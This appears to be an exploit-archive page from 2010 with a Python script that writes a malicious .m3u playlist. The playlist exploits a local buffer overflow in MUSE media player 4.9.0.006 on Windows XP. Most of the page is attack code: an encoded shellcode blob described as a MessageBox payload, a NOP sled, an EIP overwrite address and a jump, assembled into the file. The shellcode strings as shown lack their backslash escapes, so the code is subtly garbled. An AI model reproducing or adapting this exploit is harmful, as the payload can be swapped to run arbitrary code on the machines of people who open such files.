MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit
# Published : 2010-08-16
# Author : Glafkos Charalambous
# Previous Title : MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH]
# Next Title : Rosoft media player 4.4.4 SEH Buffer Overflow

# Exploit Title: MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit
# Date: August 17, 2010
# Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
# Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html
# Version: 4.9.0.006
# Tested on: Windows XP SP3 En

buffersize = 205
nopsled = "x90" * 4
# Custom MessageBox
# x86/shikata_ga_nai succeeded with size 104 (iteration=1)
shellcode = ("xd9xe5x29xc9xbexe0xc8xa6x9fxb1x14xd9x74x24xf4"
"x5fx83xc7x04x31x77x14x03x77xf4x2ax53xf7x8cx8a"
"xbcx08x04xacxd9x4axbbx5ax47x38x30xfaxefxd1xdb"
"xdcxa2x45x60x68x4exe2xefx71xd8x6fx8bx54x19x18"
"x36xf4x6cxacxd0x9fxaex09x58x08xc3xf2xf7xacx73"
"xa6x6fx48xe8xc1x8exa3x30x81x03x95xe0x98x49x12"
"x44xa3x72xcfx77x9bxdcx48x65xd0x5dxd4x75x36")

junk = "x90" * (buffersize-(len(nopsled)+len(shellcode)))
njump = "xe9x29xffxffxff"
eip = "x53x93x42x7e"

payload = nopsled+shellcode+junk+eip+nopsled+njump

try:
    print "[+] Creating exploit file.."
    exploit = open('muse.m3u','w');
    exploit.write(payload);
    exploit.close();
    print "[+] Writing", len(payload), "bytes to muse.m3u"
    print "[+] Exploit file created!"
except:
    print "[-] Error: You do not have correct permissions.."